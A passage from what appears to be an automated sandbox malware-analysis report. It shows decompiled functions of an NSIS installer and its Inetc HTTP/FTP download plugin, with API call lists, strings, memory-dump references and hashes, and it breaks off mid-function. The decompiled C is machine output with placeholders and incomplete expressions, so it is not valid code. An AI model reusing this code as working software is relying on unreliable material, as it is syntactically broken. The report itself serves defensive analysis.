FtpCreateDirectoryA.WININET(?,?), ref: 738125AC
InternetGetLastResponseInfoA.WININET(?,00000000,00000100), ref: 738125C8
lstrlenA.KERNEL32(?), ref: 738125CB
FtpOpenFileA.WININET(?,?,40000000,80000002,00000000), ref: 7381260D
InternetGetLastResponseInfoA.WININET(?,00000000,00000100), ref: 7381263E
lstrcpynA.KERNEL32(-73814FFC,00000000,00000020), ref: 7381269D
InternetGetLastResponseInfoA.WININET(?,?,?), ref: 738126E4

Strings

pvep, xrefs: 738123A0, 73812456
550, xrefs: 73812557, 7381265E, 7381267F
SIZE %s, xrefs: 73812394
110, xrefs: 738124D5
REST %d, xrefs: 7381244A
553, xrefs: 7381256E
350, xrefs: 738124BE
213 , xrefs: 738123FB

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: Last$InfoInternetResponse$FileOpenwsprintf$CreateDirectoryErrorlstrcpynlstrlen
String ID: 110$213 $350$550$553$REST %d$SIZE %s$pvep
API String ID: 4277106199-4184963234
Opcode ID: 6a49a6e2dd37bdf16600a4886d60b54a0aef185d079306e75ce118879574c8fa
Instruction ID: d15e2b7010458c8835e595399296cd32ea3a38a99610e870ef95446ea94a0527
Opcode Fuzzy Hash: 6a49a6e2dd37bdf16600a4886d60b54a0aef185d079306e75ce118879574c8fa
Instruction Fuzzy Hash: 6EB180B690021AEEEB11DBE5DC45FCA77BDAB14340F244259E54AE70C0EB749A948F60

Uniqueness

Uniqueness Score: -1.00%

Function 73812E1F, Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 123
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E73812E1F(void* __ecx, void* __esi, void* __eflags, void* _a4) {
				long _v8;
				char _v261;
				char _v263;
				char _v264;
				char _t42;
				int _t44;
				signed int _t52;

				_v264 = 0;
				E73811000( &_v263, 0, 0xff);
				_v8 = 0x100;
				if(HttpQueryInfoA(_a4, 0x13,  &_v264,  &_v8, 0) == 0) {
					return 0;
				}
				_v261 = 0;
				if(lstrcmpA( &_v264, 0x73814154) == 0 || _v264 == 0) {
					 *0x73815ab4 = 0x11;
				} else {
					if(lstrcmpA( &_v264, ?str?) != 0) {
						if(lstrcmpA( &_v264, ?str?) != 0) {
							if(lstrcmpA( &_v264, ?str?) != 0) {
								if(lstrcmpA( &_v264, ?str?) != 0) {
									if(lstrcmpA( &_v264, ?str?) != 0) {
										if(lstrcmpA( &_v264, ?str?) != 0) {
											_t42 = _v264;
											if(_t42 != 0x33) {
												if(_t42 != 0x34) {
													if(_t42 != 0x35) {
														L23:
														return 1;
													}
													_push( &_v264);
													_push(" (%s)");
													 *0x73815ab4 = 0x19;
													_push("Server Error");
													L19:
													_t44 = lstrlenA();
													_t52 =  *0x73815ab4; // 0x4
													_t19 = _t44 + 0x73815000; // 0x4b4f
													wsprintfA(_t19 + (_t52 << 5), ??);
													goto L23;
												}
												_push( &_v264);
												_push(" (%s)");
												 *0x73815ab4 = 0x18;
												_push("Request Error");
												goto L19;
											}
											_push( &_v264);
											_push(" (%s)");
											 *0x73815ab4 = 0x1e;
											_push("Redirection");
											goto L19;
										}
										 *0x73815ab4 = 0x1d;
										goto L23;
									}
									 *0x73815ab4 = 0x17;
									goto L23;
								}
								 *0x73815ab4 = 0x15;
								goto L23;
							}
							 *0x73815ab4 = 0x13;
							goto L23;
						}
						 *0x73815ab4 = 0x16;
						goto L23;
					}
					 *0x73815ab4 = 0x1a;
				}
			}

0x73812e38
0x73812e3e
0x73812e57
0x73812e66
0x00000000
0x73812ffa
0x73812e7f
0x73812e89
0x73812feb
0x73812e9b
0x73812eab
0x73812ecc
0x73812eed
0x73812f0e
0x73812f2f
0x73812f50
0x73812f61
0x73812f69
0x73812f8a
0x73812fcc
0x73812ff5
0x00000000
0x73812ff7
0x73812fd4
0x73812fd5
0x73812fda
0x73812fe4
0x73812fa7
0x73812fa7
0x73812fad
0x73812fb6
0x73812fbf
0x00000000
0x73812fc5
0x73812f92
0x73812f93
0x73812f98
0x73812fa2
0x00000000
0x73812fa2
0x73812f71
0x73812f72
0x73812f77
0x73812f81
0x00000000
0x73812f81
0x73812f52
0x00000000
0x73812f52
0x73812f31
0x00000000
0x73812f31
0x73812f10
0x00000000
0x73812f10
0x73812eef
0x00000000
0x73812eef
0x73812ece
0x00000000
0x73812ece
0x73812ead
0x73812ead

APIs

HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 73812E5E
lstrcmpA.KERNEL32(?,73814154,00000000,?,?,00000000), ref: 73812E85
lstrcmpA.KERNEL32(?,401,?,?,00000000), ref: 73812EA7
lstrcmpA.KERNEL32(?,403,?,?,00000000), ref: 73812EC8

Strings

403, xrefs: 73812EBC
(%s), xrefs: 73812F72, 73812F93, 73812FD5
Redirection, xrefs: 73812F81
Request Error, xrefs: 73812FA2
407, xrefs: 73812EFE
Server Error, xrefs: 73812FE4
401, xrefs: 73812E9B
304, xrefs: 73812F40
405, xrefs: 73812F1F
404, xrefs: 73812EDD

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: lstrcmp$HttpInfoQuery
String ID: (%s)$304$401$403$404$405$407$Redirection$Request Error$Server Error
API String ID: 386791786-4290795174
Opcode ID: 35ac7713dd14ee4fcda1a40a4393cbab87c56e258098ace94e22a99d2f342047
Instruction ID: 2f744e41a5da3c0367199522fc04749e6bb082bd43a1debec95c13f6c35b2257
Opcode Fuzzy Hash: 35ac7713dd14ee4fcda1a40a4393cbab87c56e258098ace94e22a99d2f342047
Instruction Fuzzy Hash: B441C0F290522EEBD731DBD58D84FC57BBF9B14348F14019DEA859B141E3B086A89FA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040573E, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040573E() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405D12(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x7c5730 =  *0x7c5730 + 1;
						return _t20;
					}
				}
				 *0x7bce40 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7bc8b8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x7bc4b8, "%s=%s\r\n", 0x7bce40, 0x7bc8b8);
						_t56 = _t55 + 0x10;
						E00405A12(_t43, 0x400, 0x7bc8b8, 0x7bc8b8,  *((intOrPtr*)( *0x7c56b0 + 0x128)));
						_t20 = E004056C7(0x7bc8b8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E0040563C(_t51, "[Rename]\r\n") != 0) {
								_t28 = E0040563C(_t26 + 0xa, 0x409330);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E00405688(_t51 + _t29, 0x7bc4b8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E004059F0(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004056C7(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x7bce40, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

APIs

Part of subcall function 00405D12: GetModuleHandleA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D24
Part of subcall function 00405D12: LoadLibraryA.KERNEL32(?,?,00000000,00403121,00000008), ref: 00405D2F
Part of subcall function 00405D12: GetProcAddress.KERNEL32(00000000,?), ref: 00405D40

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,004054D3,?,00000000,000000F1,?), ref: 0040578B
GetShortPathNameA.KERNEL32 ref: 00405794
GetShortPathNameA.KERNEL32 ref: 004057B1
wsprintfA.USER32 ref: 004057CF
GetFileSize.KERNEL32(00000000,00000000,007BC8B8,C0000000,00000004,007BC8B8,?,?,?,00000000,000000F1,?), ref: 0040580A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405819
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 0040582F
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007BC4B8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405875
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405887
GlobalFree.KERNEL32 ref: 0040588E
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405895

Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405643
Part of subcall function 0040563C: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,0040584A,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405673

Strings

[Rename], xrefs: 0040583F, 00405851
%s=%s, xrefs: 004057C5

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction ID: 68e1e79a5e3aa16c535a31722805a41b57947565a1a8d7e540e025e6bd358360
Opcode Fuzzy Hash: 11cba2204838a82524e086cb36a27bb1f651aff521618a1f3f6d53a001441ec3
Instruction Fuzzy Hash: FA41E072604B11ABE7217B619C49FAB3A5CEF45714F04843AFD05F62D2E63DA8018EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00404D8E, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404D8E(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x7c1684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x7c5754;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405A12(0, _t39, 0x7ac488, 0x7ac488, _a4);
					}
					_t26 = lstrlenA(0x7ac488);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x7c1668, 0x7ac488);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7ac488;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x7ac488)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x4000) {
							_t26 = lstrcatA(0x7ac488, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

APIs

lstrlenA.KERNEL32(007AC488,00000000,0079BA58,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000,?), ref: 00404DC7
lstrlenA.KERNEL32(00402F95,007AC488,00000000,0079BA58,00792458,?,?,?,?,?,?,?,?,?,00402F95,00000000), ref: 00404DD7
lstrcatA.KERNEL32(007AC488,00402F95,00402F95,007AC488,00000000,0079BA58,00792458), ref: 00404DEA
SetWindowTextA.USER32(007AC488,007AC488), ref: 00404DFC
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E22
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E3C
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E4A

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction ID: 47d110ac8a5d848b8360d243fd416ef82f1fc4428da79922e5b1b26d8c92823d
Opcode Fuzzy Hash: f720b70b0d635ca1f57644a8a0ea65d2b1c6a45dffdce1030f6556ee864f39e1
Instruction Fuzzy Hash: C82190B1900148BBDB019FA5DD80EDEBFB9EF45354F14807AF604B6291C6388E809FA8

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x792454; // 0x363211
					_t11 =  *0x7a6460; // 0x363215
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b72
0x00402b79
0x00402b7b
0x00402b7b
0x00402b91
0x00402ba1
0x00402bb3
0x00402bb3
0x00402bbb

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32(00363211,00000064,00363215), ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32 ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000006.00000002.513034077.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.513026793.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513046733.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.513055155.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513061571.000000000040B000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513067962.000000000040D000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513075385.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513670766.000000000078F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513698298.00000000007BD000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513707301.00000000007DA000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513715592.00000000007E0000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.513721767.0000000000806000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_IMG001.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction ID: ffd816cecff8be56212b11ff967eb8f2096358bc1c946807502b86a71eb66cdf
Opcode Fuzzy Hash: 26e78c3d9df5a16786ed3cc69525262c0a3a935cb00965a02e1ab4ccdd4dd0e2
Instruction Fuzzy Hash: 1F01677090020DBBDB149F60DD09FAE3779BB04745F008039FA16B92D1D7B8AA158F99

Uniqueness

Uniqueness Score: -1.00%

Function 738110C7, Relevance: 9.1, APIs: 6, Instructions: 80
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E738110C7(void* __edx, struct HWND__* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				void _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				struct tagRECT _v56;
				struct HWND__* _t23;
				void* _t45;
				intOrPtr _t49;
				void* _t50;
				int _t53;
				signed int _t59;
				int _t60;

				_t50 = __edx;
				_t23 = GetParent(_a4);
				if(_t23 == 0 ||  *0x73815ad8 != 0) {
					return _t23;
				} else {
					_push( &_v40);
					_push(_t23);
					if( *0x73815ad9 == 0) {
						GetClientRect();
					} else {
						GetWindowRect();
					}
					GetWindowRect(_a4,  &_v56);
					_t45 = _v56.right - _v56.left;
					_t49 = _v56.bottom - _v56.top;
					_v8 = _t49;
					asm("cdq");
					_t53 = _v32 - _t45 + _v40 - _t50 >> 1;
					asm("cdq");
					_t59 = _v28 - _t49 + _v36 - _t50 >> 1;
					if( *0x73815ad9 == 0) {
						_t60 = _t59 + 0x14;
					} else {
						SystemParametersInfoA(0x30, 0,  &_v24, 0);
						_t55 =  >  ? _v16 - _t45 : _t53;
						_t53 =  <  ? _v24 :  >  ? _v16 - _t45 : _t53;
						_t60 =  >  ? _v12 - _v8 : _t59;
						if(_t60 < _v20) {
							_t60 = _v20;
						}
					}
					return SetWindowPos(_a4, 0, _t53, _t60, 0, 0, 1);
				}
			}

0x738110c7
0x738110d0
0x738110d8
0x7381119b
0x738110eb
0x738110fe
0x738110ff
0x73811100
0x73811106
0x73811102
0x73811102
0x73811102
0x73811113
0x73811118
0x73811121
0x73811129
0x7381112c
0x73811139
0x7381113b
0x73811140
0x73811149
0x73811181
0x7381114b
0x73811155
0x73811162
0x7381116b
0x73811174
0x7381117a
0x7381117c
0x7381117c
0x7381117a
0x00000000
0x73811199

APIs

GetParent.USER32(?), ref: 738110D0
GetWindowRect.USER32 ref: 73811102
GetClientRect.USER32 ref: 73811106
GetWindowRect.USER32 ref: 73811113
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 73811155
SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000001), ref: 73811191

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: RectWindow$ClientInfoParametersParentSystem
String ID:
API String ID: 1395677574-0
Opcode ID: 28942a92cccdfc799905ff206adf4111dce8783e403a69d7183df6ca28d90227
Instruction ID: 833e7598ab06cee2e61df3e34c8145924d517cdaa8fc06410fe0619b5ee63175
Opcode Fuzzy Hash: 28942a92cccdfc799905ff206adf4111dce8783e403a69d7183df6ca28d90227
Instruction Fuzzy Hash: 58212E72E4011AAFDB41EEFDCD89BDDBBBAAB48640F254168E905B3180D770A954CB60

Uniqueness

Uniqueness Score: -1.00%

Function 738115F9, Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 33stringCOMMON

Download Yara Rule

APIs

lstrcpyA.KERNEL32(73812273,73814154,?,73812273,00000000,?), ref: 73811617
wsprintfA.USER32 ref: 7381164C

Strings

%u MB, xrefs: 73811644
???, xrefs: 73811604
%u kB, xrefs: 73811639
%u bytes, xrefs: 73811627

Memory Dump Source

Source File: 00000006.00000002.517158202.0000000073811000.00000020.00020000.sdmp, Offset: 73810000, based on PE: true

Associated: 00000006.00000002.517148776.0000000073810000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517168485.0000000073814000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.517176098.0000000073815000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.517187455.0000000073819000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_73810000_IMG001.jbxd

Similarity

API ID: lstrcpywsprintf
String ID: %u MB$%u bytes$%u kB$???
API String ID: 2408954437-4199891213
Opcode ID: 8f42ea07bb7236467d4cabf77dc556e27dc4a542eb44284fb6725c55a4a8cf03
Instruction ID: 3dc287cca1ff9b379b7d8de2f6e051d74a310d21ad7578faa0b69d723ae0c519
Opcode Fuzzy Hash: 8f42ea07bb7236467d4cabf77dc556e27dc4a542eb44284fb6725c55a4a8cf03
Instruction Fuzzy Hash: 9DF0A07112011EAEC71209E5AC40F64733FAB04229F2C472DFD2EDB682F772C4B48805

Uniqueness

Uniqueness Score: -1.00%

Function 73813B04, Relevance: 9.0, APIs: 2, Strings: 4, Instructions: 11
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E73813B04(void* __ecx, void* __eflags, long _a4, long _a8, int _a12, intOrPtr _a16) {
				struct HWND__* _v0;
				struct tagMSG _v36;
				char _v95;
				char _v96;
				char _v100;
				char _v159;
				char _v160;
				char _v164;
				CHAR* _t47;
				void* _t50;
				void* _t51;
				CHAR* _t52;
				signed char _t54;
				long _t55;
				struct HWND__* _t56;
				void* _t58;
				void* _t63;
				long _t64;
				signed int _t65;
				int _t68;
				CHAR* _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				short* _t79;
				signed int _t80;
				void* _t99;
				struct HWND__* _t102;
				struct _SECURITY_ATTRIBUTES* _t106;
				struct HWND__* _t109;
				struct _SECURITY_ATTRIBUTES* _t117;
				struct _SECURITY_ATTRIBUTES* _t119;
				struct _SECURITY_ATTRIBUTES* _t121;
				struct HWND__* _t136;
				CHAR* _t141;
				struct _SECURITY_ATTRIBUTES* _t145;
				struct _SECURITY_ATTRIBUTES* _t146;
				struct _SECURITY_ATTRIBUTES* _t147;
				struct _SECURITY_ATTRIBUTES* _t148;
				struct _SECURITY_ATTRIBUTES* _t149;
				struct _SECURITY_ATTRIBUTES* _t150;
				struct _SECURITY_ATTRIBUTES* _t151;
				struct _SECURITY_ATTRIBUTES* _t152;
				struct _SECURITY_ATTRIBUTES* _t153;
				struct _SECURITY_ATTRIBUTES* _t154;
				struct _SECURITY_ATTRIBUTES* _t155;
				struct _SECURITY_ATTRIBUTES* _t156;
				struct _SECURITY_ATTRIBUTES* _t157;
				struct _SECURITY_ATTRIBUTES* _t158;
				struct _SECURITY_ATTRIBUTES* _t159;
				struct _SECURITY_ATTRIBUTES* _t160;
				struct _SECURITY_ATTRIBUTES* _t161;
				struct _SECURITY_ATTRIBUTES* _t162;
				struct _SECURITY_ATTRIBUTES* _t163;
				long _t166;
				struct _SECURITY_ATTRIBUTES* _t168;
				void* _t169;
				void* _t172;
				int _t173;
				signed int _t177;
				struct _SECURITY_ATTRIBUTES* _t179;
				short* _t180;
				int _t182;
				void* _t183;
				void* _t195;
				int _t212;
				long _t223;
				struct HWND__* _t227;
				void* _t231;
				char _t235;
				void* _t237;
				signed int _t238;
				struct HWND__* _t251;
				void* _t252;
				long _t255;
				int _t257;
				struct HWND__* _t258;
				void* _t262;
				struct HWND__* _t264;
				void* _t265;
				void* _t266;
				void* _t270;
				void* _t272;
				void* _t276;
				signed int _t319;
				signed int _t320;
				struct _SECURITY_ATTRIBUTES* _t321;

				 *0x73815adf = 1;
				lstrcpyA("Downloading %s", "Uploading %s");
				lstrcpyA("Downloading", "Uploading");
				_pop(_t268);
				_v160 = 0;
				E73811000( &_v159, 0, 0x3f);
				_v96 = 0;
				E73811000( &_v95, 0, 0x3f);
				_t255 = _a8;
				 *0x73818c34 = _a16;
				_t272 = _t270 - 0x9c + 0x18;
				 *0x73818c30 = _a12;
				 *0x73818c38 = _t255;
				 *0x73815add = 0;
				 *0x73815adc = 0;
				 *0x73815adb = 0;
				 *0x73815ada = 0;
				 *0x73815ad9 = 0;
				 *0x73815ad8 = 0;
				 *0x738156c0 = 0;
				 *0x73815ad4 = 0;
				 *0x73815ab4 = 1;
				 *0x73815bb0 = 0;
				 *0x73815b30 = 0;
				 *0x738158a8 = 0;
				 *0x738157e8 = 0;
				 *0x73815828 = 0;
				_t47 = LocalAlloc(0x40, _t255);
				_t250 = _t47;
				 *0x738157cc = _t47;
				_t276 =  *0x738157e4; // 0x0
				if(_t276 != 0) {
					E73813B5A(_t250);
					lstrcpyA( *0x738157e4,  *0x738157cc);
					_t223 = lstrlenA( *0x738157e4);
					_t250 =  *0x738157cc; // 0x3146150
					 *0x73815aac = _t223;
				}
				_t50 = 1;
				_t234 =  !=  ? _t50 :  *0x73815ad8 & 0x000000ff;
				 *0x73815ad8 =  !=  ? _t50 :  *0x73815ad8 & 0x000000ff;
				_t51 = E73813B5A(_t250);
				while(_t51 == 0) {
					_t52 =  *0x738157cc; // 0x3146150
					__eflags =  *_t52 - 0x2f;
					if( *_t52 != 0x2f) {
						L66:
						E73813B9E(_t52);
						if( *0x738158a8 == 0) {
							lstrcpyA("NSIS_Inetc (Mozilla)", "NSIS_Inetc (Mozilla)");
						}
						if(_v100 != 0 && _v164 != 0) {
							wsprintfA( *0x738157cc, "%s:%s",  &_v164,  &_v100);
							_t141 =  *0x738157cc; // 0x3146150
							E738113A9(_t234, lstrlenA(_t141), _t141, 0x73815bb0);
							_t272 = _t272 + 0x1c;
						}
						_t227 = _v0;
						if(_t227 == 0) {
							L77:
							__imp__#17();
							goto L78;
						} else {
							_t136 = FindWindowExA(_t227, 0, "#32770", 0);
							 *0x73815ae0 = _t136;
							if(_t136 == 0 ||  *0x73815ad8 != 0) {
								goto L77;
							} else {
